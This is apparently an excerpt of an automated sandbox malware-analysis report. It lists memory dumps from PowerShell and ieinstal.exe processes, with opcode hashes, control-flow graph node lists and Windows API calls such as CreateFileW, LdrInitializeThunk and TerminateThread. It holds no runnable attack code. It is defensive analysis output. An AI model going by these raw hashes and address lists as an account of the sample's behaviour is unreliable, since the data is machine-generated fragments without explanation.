                        • Source File: 00000004.00000002.562493421.0000000007610000.00000040.00000001.sdmp, Offset: 07610000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7610000_powershell.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 21a07d47c8cd8df769fdcf1a09c2141fa8456d2f64a09a23df96af2da64518b5
                        • Instruction ID: a4daf4f8d08dab0af7ad7f5caac3f802034e96c5a3fc22240c2273ab92491934
                        • Opcode Fuzzy Hash: 21a07d47c8cd8df769fdcf1a09c2141fa8456d2f64a09a23df96af2da64518b5
                        • Instruction Fuzzy Hash: 3B31B0B2C093999FCB01CFA9D858ADEBFB4FF0A310F08459AE845A7611C3349955CBE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        control_flow_graph 54 761ed88-761edab 58 761ee14-761ee1a 54->58 59 761edad-761f83c 54->59 64 761f844-761f87f CreateFileW 59->64 65 761f83e-761f841 59->65 66 761f881-761f887 64->66 67 761f888-761f8a5 64->67 65->64 66->67
                        APIs
                        • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0761F767,00000000,00000000,00000003,00000000,00000002), ref: 0761F872
                        Memory Dump Source
                        • Source File: 00000004.00000002.562493421.0000000007610000.00000040.00000001.sdmp, Offset: 07610000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7610000_powershell.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 60ffebef7e93295071898bab26d9acde5aef03be5a84eba0739b4d3e298e842f
                        • Instruction ID: 7bb5c4adaf7ad578680006d360d74ea824fdddbb31511cb87739d9c527ea92dd
                        • Opcode Fuzzy Hash: 60ffebef7e93295071898bab26d9acde5aef03be5a84eba0739b4d3e298e842f
                        • Instruction Fuzzy Hash: A631AFB2C052599FCB01DFA9D858ADEBFB4FF09314F04896AE805A7A00C3349950CFE5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        control_flow_graph 70 761edc4-761f83c 73 761f844-761f87f CreateFileW 70->73 74 761f83e-761f841 70->74 75 761f881-761f887 73->75 76 761f888-761f8a5 73->76 74->73 75->76
                        APIs
                        • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0761F767,00000000,00000000,00000003,00000000,00000002), ref: 0761F872
                        Memory Dump Source
                        • Source File: 00000004.00000002.562493421.0000000007610000.00000040.00000001.sdmp, Offset: 07610000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7610000_powershell.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: f4818fa1df54354a6baace599290315ad8d502fe16a88c97563bec6be3a8fff0
                        • Instruction ID: 9a4268e6a4d07956c0cd1908f02f404ec362d17338fa2c1ecb0c4c65c0ff6d08
                        • Opcode Fuzzy Hash: f4818fa1df54354a6baace599290315ad8d502fe16a88c97563bec6be3a8fff0
                        • Instruction Fuzzy Hash: 4F2125B1D0061AABCB10CF99D844ADEFBB4FB48314F14852AE919B7710C374A954CFE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        control_flow_graph 79 d14de8-d14e3a 81 d14e42-d14e6d GetFileAttributesW 79->81 82 d14e3c-d14e3f 79->82 83 d14e76-d14e93 81->83 84 d14e6f-d14e75 81->84 82->81 84->83
                        APIs
                        • GetFileAttributesW.KERNELBASE(00000000), ref: 00D14E60
                        Memory Dump Source
                        • Source File: 00000004.00000002.551378345.0000000000D10000.00000040.00000001.sdmp, Offset: 00D10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_d10000_powershell.jbxd
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: 0b2f31902ff13d322b0eebceee2cbbea8ecbe08ad364cd19417d51c49fbcdd4d
                        • Instruction ID: a6f058621c01ef62f3e069e3abe5d10b6bc9afb5d76e4985a862039317c7cf75
                        • Opcode Fuzzy Hash: 0b2f31902ff13d322b0eebceee2cbbea8ecbe08ad364cd19417d51c49fbcdd4d
                        • Instruction Fuzzy Hash: E41103B1D006199BCB10CFA9E5446DEFBB4FB88724F14852AE819B7700D774AA45CFE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        control_flow_graph 87 d13f9c-d14e3a 90 d14e42-d14e6d GetFileAttributesW 87->90 91 d14e3c-d14e3f 87->91 92 d14e76-d14e93 90->92 93 d14e6f-d14e75 90->93 91->90 93->92
                        APIs
                        • GetFileAttributesW.KERNELBASE(00000000), ref: 00D14E60
                        Memory Dump Source
                        • Source File: 00000004.00000002.551378345.0000000000D10000.00000040.00000001.sdmp, Offset: 00D10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_d10000_powershell.jbxd
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: f649d69813cf8907ce889c83b4bcdc5035162554145b3f1b909e219f71e845c2
                        • Instruction ID: e9873e6fc9a3bac3acb9dbff0a07fab254b3f50fa019acb20f628470c113a846
                        • Opcode Fuzzy Hash: f649d69813cf8907ce889c83b4bcdc5035162554145b3f1b909e219f71e845c2
                        • Instruction Fuzzy Hash: 202110B1D046199BCB10CFAAE8446DEFBB4BB88724F14812AE918B7600D774A940CFE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000004.00000002.550301790.000000000082D000.00000040.00000001.sdmp, Offset: 0082D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_82d000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7cd6a23efa7946db390040d9c24972aaa3037aabf726e3e106f4f120ba5d017f
                        • Instruction ID: 405b7103790c094cee7a826d5a5a7c96937f973b1fd0fab405282e859692845b
                        • Opcode Fuzzy Hash: 7cd6a23efa7946db390040d9c24972aaa3037aabf726e3e106f4f120ba5d017f
                        • Instruction Fuzzy Hash: E901F731408B54AAE7108F51E884767BFC8FF41768F18C41AEC449B293C3799885C6B1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000004.00000002.550301790.000000000082D000.00000040.00000001.sdmp, Offset: 0082D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_82d000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b7d495864e95854b6915a48862a75d3a63eb09e8e01fba5a6c8320aefca651b0
                        • Instruction ID: a87a2b2c0637ca23fb0b779a44369bbda14d7db47ea3031abcd7226d7fe2c68f
                        • Opcode Fuzzy Hash: b7d495864e95854b6915a48862a75d3a63eb09e8e01fba5a6c8320aefca651b0
                        • Instruction Fuzzy Hash: 65F0AF71404754AAEB108A15D884B62FFD8EF91724F18C45AED488F282C3B99844CAB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.551378345.0000000000D10000.00000040.00000001.sdmp, Offset: 00D10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_d10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: D!m$T:m$t%m
                        • API String ID: 0-1058837607
                        • Opcode ID: 94e0cf65e34a5eb96279f64bbaab8cab8c1dd4c27186a03216fdbc2b7dca81d3
                        • Instruction ID: c291ae08d72110bc65148b36642f681c0d96c334f2483718187cb0b8aff37fd0
                        • Opcode Fuzzy Hash: 94e0cf65e34a5eb96279f64bbaab8cab8c1dd4c27186a03216fdbc2b7dca81d3
                        • Instruction Fuzzy Hash: 0AA29D7070021C9FEB24DBB49C61BBE3567EFC5704F158128A5069F3C9DEB58DA24BA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:0.7%
                        Dynamic/Decrypted Code Coverage:99.4%
                        Signature Coverage:57.4%
                        Total number of Nodes:698
                        Total number of Limit Nodes:34

16211 1ed13f4d 16211->16202 16214 1ed13f5a GetPEB 16211->16214 16212 1ed13f3b GetPEB 16212->16211 16213->16207 16213->16208 16213->16209 16214->16202 16215 1ed68324 GetPEB 16215->16207 16216 1ed1404f 16216->16207 16217 1ed14058 GetPEB 16216->16217 16217->16207 16218->16207 16218->16211 16218->16212 16219->16207 16219->16215 16219->16216 16222 1ed0dcfd 16220->16222 16231 1ed0dd6f _vswprintf_s 16220->16231 16221 1ed0dd47 16246 1ed0dbb1 16221->16246 16222->16221 16226 1ed0dfae _vswprintf_s 16222->16226 16239 1ed0e620 16222->16239 16224 1ed64ff2 16224->16224 16229 1ed4b640 _vswprintf_s 11 API calls 16226->16229 16230 1ed0dfe4 16229->16230 16230->16180 16231->16224 16231->16226 16253 1ed0e375 16231->16253 16237 1ed11ba9 _vswprintf_s 16233->16237 16238 1ed11c05 16233->16238 16234 1ed6701a GetPEB 16235 1ed11c21 16234->16235 16235->16185 16236 1ed11bf4 GetPEB 16236->16238 16237->16235 16237->16236 16237->16238 16238->16234 16238->16235 16240 1ed0e644 16239->16240 16241 1ed65503 16239->16241 16240->16241 16258 1ed0f358 16240->16258 16243 1ed0e661 _vswprintf_s 16244 1ed0e729 GetPEB 16243->16244 16245 1ed0e73b 16243->16245 16244->16245 16245->16221 16262 1ed1766d 16246->16262 16248 1ed0dbcf 16248->16231 16249 1ed0dbf1 16248->16249 16250 1ed0dc05 16249->16250 16251 1ed1766d GetPEB 16250->16251 16252 1ed0dc22 16251->16252 16252->16231 16257 1ed0e3a3 16253->16257 16254 1ed4b640 _vswprintf_s 11 API calls 16256 1ed0e400 16254->16256 16255 1ed65306 16256->16231 16257->16254 16257->16255 16259 1ed0f370 16258->16259 16260 1ed0f38c 16259->16260 16261 1ed0f379 GetPEB 16259->16261 16260->16243 16261->16260 16264 1ed17687 16262->16264 16263 1ed176d3 16263->16248 16264->16263 16265 1ed176c2 GetPEB 16264->16265 16265->16263 16267 1ed04dd1 16266->16267 16269 1ed04df3 16267->16269 16283 1ed04f2e 16267->16283 16269->15821 16368 1ed5d0e8 16270->16368 16272 1ed9ff1c GetPEB 16273 1ed9ff43 GetPEB 16272->16273 16275 1ed9ff2b 16272->16275 16276 1ed9ff4f 16273->16276 16277 1ed9ff6e 16273->16277 
16274 1ed9ffb1 16279 1ed5d130 _vswprintf_s 11 API calls 16274->16279 16275->16273 16275->16274 16280 1ed95720 _vswprintf_s 11 API calls 16276->16280 16278 1ed3e730 2 API calls 16277->16278 16282 1ed9ff7d 16278->16282 16281 1ed9ffb6 16279->16281 16280->16277 16281->15819 16282->15819 16284 1ed60b85 16283->16284 16287 1ed04f3e 16283->16287 16285 1ed60b9a 16284->16285 16286 1ed60b8b GetPEB 16284->16286 16292 1edd88f5 16285->16292 16286->16285 16288 1ed60b9f 16286->16288 16287->16284 16290 1ed04f5b GetPEB 16287->16290 16290->16284 16291 1ed04f6e 16290->16291 16291->16269 16293 1edd8901 _vswprintf_s 16292->16293 16298 1ed0cc50 16293->16298 16295 1edd891f 16296 1ed5d130 _vswprintf_s 11 API calls 16295->16296 16297 1edd8946 16296->16297 16297->16288 16301 1ed0cc79 16298->16301 16299 1ed0cc7e 16300 1ed4b640 _vswprintf_s 11 API calls 16299->16300 16302 1ed0cc89 16300->16302 16301->16299 16304 1ed3b230 16301->16304 16302->16295 16305 1ed3b26a 16304->16305 16306 1ed7a2f6 16304->16306 16305->16306 16307 1ed7a2fd 16305->16307 16312 1ed3b2ab _vswprintf_s 16305->16312 16308 1ed3b2b5 16307->16308 16322 1edd5ba5 16307->16322 16308->16306 16309 1ed4b640 _vswprintf_s 11 API calls 16308->16309 16311 1ed3b2d0 16309->16311 16311->16299 16312->16308 16314 1ed0ccc0 16312->16314 16315 1ed0cd04 16314->16315 16316 1ed0b150 _vswprintf_s 11 API calls 16315->16316 16321 1ed0cd95 16315->16321 16317 1ed64e0a 16316->16317 16318 1ed0b150 _vswprintf_s 11 API calls 16317->16318 16319 1ed64e14 16318->16319 16320 1ed0b150 _vswprintf_s 11 API calls 16319->16320 16320->16321 16321->16308 16323 1edd5bb4 _vswprintf_s 16322->16323 16329 1edd5c10 16323->16329 16330 1edd5c2a _vswprintf_s 16323->16330 16333 1edd4c56 16323->16333 16325 1ed5d130 _vswprintf_s 11 API calls 16326 1edd63e5 16325->16326 16326->16308 16329->16325 16330->16329 16331 1edd60cf GetPEB 16330->16331 16332 1ed49710 LdrInitializeThunk 16330->16332 16337 1ed46de6 16330->16337 16331->16330 16332->16330 16334 1edd4c62 _vswprintf_s 16333->16334 
16335 1ed5d130 _vswprintf_s 11 API calls 16334->16335 16336 1edd4caa 16335->16336 16336->16330 16338 1ed46e73 16337->16338 16339 1ed46e03 16337->16339 16338->16330 16339->16338 16341 1ed46e53 16339->16341 16343 1ed46ebe 16339->16343 16341->16338 16351 1ed36a60 16341->16351 16344 1ed1eef0 26 API calls 16343->16344 16345 1ed46eeb 16344->16345 16346 1ed46f0d 16345->16346 16356 1ed47742 16345->16356 16362 1edb84e0 16345->16362 16347 1ed1eb70 32 API calls 16346->16347 16348 1ed46f48 16347->16348 16348->16339 16352 1ed78025 16351->16352 16354 1ed36a8d _vswprintf_s 16351->16354 16353 1ed4b640 _vswprintf_s 11 API calls 16355 1ed36b66 16353->16355 16354->16352 16354->16353 16355->16338 16357 1ed47827 16356->16357 16359 1ed47768 _vswprintf_s 16356->16359 16357->16345 16358 1ed49660 _vswprintf_s LdrInitializeThunk 16358->16359 16359->16357 16359->16358 16360 1ed1eef0 26 API calls 16359->16360 16361 1ed1eb70 32 API calls 16359->16361 16360->16359 16361->16359 16363 1edb8511 16362->16363 16364 1ed1eb70 32 API calls 16363->16364 16367 1edb8556 16364->16367 16365 1ed1eef0 26 API calls 16366 1edb85f1 16365->16366 16366->16345 16367->16365 16368->16272 16370 1ed20074 16369->16370 16371 1ed2009d GetPEB 16370->16371 16382 1ed200ef 16370->16382 16372 1ed6c01b 16371->16372 16375 1ed200d0 16371->16375 16374 1ed6c024 GetPEB 16372->16374 16372->16375 16373 1ed4b640 _vswprintf_s 11 API calls 16376 1ed20105 16373->16376 16374->16375 16377 1ed6c037 16375->16377 16378 1ed200df 16375->16378 16376->15827 16387 1edd8a62 16377->16387 16383 1ed39702 16378->16383 16381 1ed6c04b 16381->16381 16382->16373 16385 1ed39720 16383->16385 16386 1ed39784 16385->16386 16394 1edd8214 16385->16394 16386->16382 16388 1ed27d50 GetPEB 16387->16388 16389 1edd8a9d 16388->16389 16390 1edd8aa1 GetPEB 16389->16390 16391 1edd8ab1 _vswprintf_s 16389->16391 16390->16391 16392 1ed4b640 _vswprintf_s 11 API calls 16391->16392 16393 1edd8ad7 16392->16393 16393->16381 16396 1edd823b 16394->16396 16395 1edd82c0 16395->16386 
16396->16395 16398 1ed33b7a GetPEB 16396->16398 16402 1ed33bb5 _vswprintf_s 16398->16402 16399 1ed76298 16400 1ed33c1b GetPEB 16401 1ed33c35 16400->16401 16401->16395 16402->16399 16402->16400 16402->16402 16404 1ed17620 16403->16404 16405 1ed1766d GetPEB 16404->16405 16406 1ed17632 16405->16406 16406->15833 16408 1ed49670 16410 1ed4967a 16408->16410 16411 1ed49681 16410->16411 16412 1ed4968f LdrInitializeThunk 16410->16412 16581 1ed435b1 16582 1ed435ca 16581->16582 16583 1ed435f2 16581->16583 16582->16583 16584 1ed17608 GetPEB 16582->16584 16584->16583 16585 1edde5b6 16586 1edde608 16585->16586 16587 1edde5e1 16585->16587 16589 1ed4b640 _vswprintf_s 11 API calls 16586->16589 16587->16586 16591 1edded52 16587->16591 16590 1edde626 16589->16590 16594 1edded73 16591->16594 16592 1ed4b640 _vswprintf_s 11 API calls 16593 1eddee6d 16592->16593 16593->16587 16594->16592 16413 2d065be 16414 2d065c1 16413->16414 16414->16414 16415 2d065e6 TerminateThread 16414->16415 16416 2d0662c 16415->16416 16595 1ed00b60 16596 1ed00b72 16595->16596 16598 1ed00baf 16595->16598 16596->16598 16599 1ed00bd0 16596->16599 16600 1ed00c66 16599->16600 16606 1ed00c05 16599->16606 16601 1ed5e915 16600->16601 16602 1ed5e940 16600->16602 16605 1ed00c8d _vswprintf_s 16600->16605 16601->16605 16608 1ed51700 16601->16608 16604 1ed51700 11 API calls 16602->16604 16602->16605 16604->16605 16605->16598 16606->16600 16606->16605 16607 1ed51700 11 API calls 16606->16607 16607->16606 16611 1ed514e9 16608->16611 16610 1ed5171c 16610->16605 16612 1ed514fb 16611->16612 16613 1ed4b58e _vswprintf_s 11 API calls 16612->16613 16614 1ed5150e __cftof 16612->16614 16613->16614 16614->16610 16615 1ed335a1 16616 1ed335a7 16615->16616 16617 1ed335b7 16616->16617 16618 1ed335b8 GetPEB 16616->16618 16619 1ed1eb70 32 API calls 16618->16619 16619->16617 16620 1edc0a28 16621 1edc0a57 16620->16621 16623 1edc0a4d 16620->16623 16624 1ed34e70 16621->16624 16625 1ed34e94 16624->16625 16629 1ed34ec0 16624->16629 16626 1ed4b640 
_vswprintf_s 11 API calls 16625->16626 16627 1ed34eac 16626->16627 16627->16623 16628 1edb8df1 12 API calls 16628->16625 16629->16625 16629->16628 16423 1edd5ba5 16424 1edd5bb4 _vswprintf_s 16423->16424 16425 1edd4c56 11 API calls 16424->16425 16430 1edd5c10 16424->16430 16431 1edd5c2a _vswprintf_s 16424->16431 16425->16431 16426 1ed5d130 _vswprintf_s 11 API calls 16427 1edd63e5 16426->16427 16429 1ed46de6 31 API calls 16429->16431 16430->16426 16431->16429 16431->16430 16432 1edd60cf GetPEB 16431->16432 16433 1ed49710 LdrInitializeThunk 16431->16433 16432->16431 16433->16431

                        Executed Functions

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 23 1ed496e0-1ed496ec LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 1b6c00d2c1ac082ca3ccb186ccddb39ac0707fc9a757a78b76176c0e849dff8e
                        • Instruction ID: 65a90602e614fb329bd6b70c98b758e03ff59fdd58d64c9aea22dbfb8d659ce2
                        • Opcode Fuzzy Hash: 1b6c00d2c1ac082ca3ccb186ccddb39ac0707fc9a757a78b76176c0e849dff8e
                        • Instruction Fuzzy Hash: 7C90027120108807D511615A840475F00159BD4741F95C511E4414638D86D688D27571
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 22 1ed49660-1ed4966c LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 1a2a4f285389ce24531e267a3e2ec7c070490b97a8620aaa520399888eeab167
                        • Instruction ID: f6a814b6c35a78c960069b0167adca79d45d854320987b6fc6be1201335899c2
                        • Opcode Fuzzy Hash: 1a2a4f285389ce24531e267a3e2ec7c070490b97a8620aaa520399888eeab167
                        • Instruction Fuzzy Hash: 9190027120100807D581715A440465F00159BD5741FD1C115E0015634DCA568ADA7BF1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 25 1ed49780-1ed4978c LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: fbe2172ca20c2e0b7593d43bd5bd1b9918f4e7001d36c68623a42e9e5a44be63
                        • Instruction ID: 29d771cd8b60be49563eb81120f4d14bc2cab94f1b5324454dcadf706224fa2a
                        • Opcode Fuzzy Hash: fbe2172ca20c2e0b7593d43bd5bd1b9918f4e7001d36c68623a42e9e5a44be63
                        • Instruction Fuzzy Hash: 7C90026921300007D581715A540861F00159BD5642FD1D515E0005538CC95688EA6771
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 26 1ed497a0-1ed497ac LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: ce37319bf1d45c800241b633c366733248f9369d600ffb75f19c6f28ccbb8ad2
                        • Instruction ID: 08ec6c18c677a57e3126d012898ab342a8617158af2c64a0b4cab2a631f5b38e
                        • Opcode Fuzzy Hash: ce37319bf1d45c800241b633c366733248f9369d600ffb75f19c6f28ccbb8ad2
                        • Instruction Fuzzy Hash: 7390026130100007D541715A541861B4015EBE5741F91D111E0404534CD95688D76672
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 24 1ed49710-1ed4971c LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: c11b1f1b01d56c333a6998da4866feb2226604b31f9b2cf3ab9e13d691bccbbf
                        • Instruction ID: 305e46a11d22b768f23b0803cb8ed7bdbd8ce0f52a89ed20b43ab229b525bf14
                        • Opcode Fuzzy Hash: c11b1f1b01d56c333a6998da4866feb2226604b31f9b2cf3ab9e13d691bccbbf
                        • Instruction Fuzzy Hash: 8990027120100407D501659A540865B00159BE4741F91D111E5014535EC6A688D27571
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 21 1ed49540-1ed4954c LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 4c612e29c05e63055310368ceecc3df153b311dfb6270335ac7e77519d6b0334
                        • Instruction ID: 8b28c3b5ca8ea98b29563ab0259b314101f2c1dfd09699c06bc917574b346c42
                        • Opcode Fuzzy Hash: 4c612e29c05e63055310368ceecc3df153b311dfb6270335ac7e77519d6b0334
                        • Instruction Fuzzy Hash: F4900265211000070506A55A070451B00569BD9791391C121F1005530CD66288E26571
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: ac0bb2f209556c61d4d7dc923c43dd7899a3582e170d50529dcc628f924fedeb
                        • Instruction ID: bf4a1b2a6fbba41c0f268b4f833b6a85753f1c39c5d54dc770ab23ad316aeb0d
                        • Opcode Fuzzy Hash: ac0bb2f209556c61d4d7dc923c43dd7899a3582e170d50529dcc628f924fedeb
                        • Instruction Fuzzy Hash: 1D90026121180047D601656A4C14B1B00159BD4743F91C215E0144534CC95688E26971
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 32 1ed49a00-1ed49a0c LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 3a35f593bf3568f99283faa1e1b664a80371519f415e8e1a3da321f5d912cfc4
                        • Instruction ID: d96cf50bb2f487f4c66ab3e1442bfeff48a90f2c5f4cfbde232bb8fb3ee0d551
                        • Opcode Fuzzy Hash: 3a35f593bf3568f99283faa1e1b664a80371519f415e8e1a3da321f5d912cfc4
                        • Instruction Fuzzy Hash: C890027120140407D501615A481471F00159BD4742F91C111E1154535D866688D279B1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 33 1ed49a20-1ed49a2c LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 7a8b1fef066f661b56c70f163c55a8e5ee91bfc3f8188a359559b3702153e05f
                        • Instruction ID: fd3d0dcae8788205b9f9a78abe27de4a2c371787c2eba225fedb4c1a44f351f4
                        • Opcode Fuzzy Hash: 7a8b1fef066f661b56c70f163c55a8e5ee91bfc3f8188a359559b3702153e05f
                        • Instruction Fuzzy Hash: E0900261601000474541716A884491B4015BFE5651791C221E0988530D859A88E66AB5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 29 1ed498f0-1ed498fc LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 798d90e4ea58faf3964f8d6e68beeebe620f137f8ba33d880ad30f203373dcb1
                        • Instruction ID: 6ea5d153b998271c58b2af5e070f7866e71a3f509c9c310b9683df925a562424
                        • Opcode Fuzzy Hash: 798d90e4ea58faf3964f8d6e68beeebe620f137f8ba33d880ad30f203373dcb1
                        • Instruction Fuzzy Hash: 9790026160100507D502715A440462B001A9BD4681FD1C122E1014535ECA6689D3B571
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 27 1ed49840-1ed4984c LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
